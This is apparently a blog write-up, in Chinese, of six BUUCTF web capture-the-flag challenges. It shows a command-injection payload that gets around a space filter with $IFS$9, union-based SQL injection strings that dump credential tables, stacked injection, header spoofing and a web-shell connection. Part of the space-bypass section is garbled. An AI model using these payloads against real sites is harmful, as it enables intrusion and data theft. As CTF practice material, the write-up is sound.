BUUCTF
文章目录
一、[GXYCTF2019]Ping Ping Ping
使用ls命令
有个flag.php
cat flag
过滤了空格
linux下对空格的绕过方法:
1.
I
F
S
2.
{IFS} 2.
IFS2.IFS$9
9
可改成其他数字
3.
<
4.
<
>
重定向符
5.
c
a
t
,
f
l
a
g
.
p
h
p
用逗号
,
实现了空格功能先用
9可改成其他数字 3.< 4.<> 重定向符 5.{cat,flag.php} 用逗号,实现了空格功能 先用
9可改成其他数字3.<4.<>重定向符5.cat,flag.php用逗号,实现了空格功能先用{IFS}
被过滤了
$IFS$9
flag被过滤了
看看index文件
这个可以使用拼接绕过
构造payload:
/?ip=1;b=agcat$IFS$9fl$b.php
二、[SUCTF 2019]EasySQL
万能密码不行
堆叠注入
1’;show tables;
1;show columns from Flag#
不行看别的博客学到了
1、mssql中||表示连接操作符,不表示或的逻辑。
2、设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用//就是将||的或转换成连接符
三、[极客大挑战 2019]Secret File
看看源码
进去看看
点击直接跳转
抓个包看看
访问
直接使用php伪协议读取
四、[极客大挑战 2019]LoveSQL
万能密码试一下
存在注入点
联合注入
1' union select 1,2,3#
查数据库
1' union select 1,database(),3#
查表
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'#
查看l0ve1ysq1中内容
1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1#
拿到flag
五、[极客大挑战 2019]Http
抓个包
访问
来自这个网址加一个Referer:
发现响应信息提示:Please use “Syclover” browser,即需要增加User-Agent
加一个X-Forwarded-For: 127.0.0.1
X-Forwarded-For 是一个 HTTP 扩展头部,用来表示 HTTP 请求端真实 IP。与之相关的有X-Real-IP、 $remote_addr。
拿到flag
六、[极客大挑战 2019]Knife
蚁剑链接
根目录下拿到flag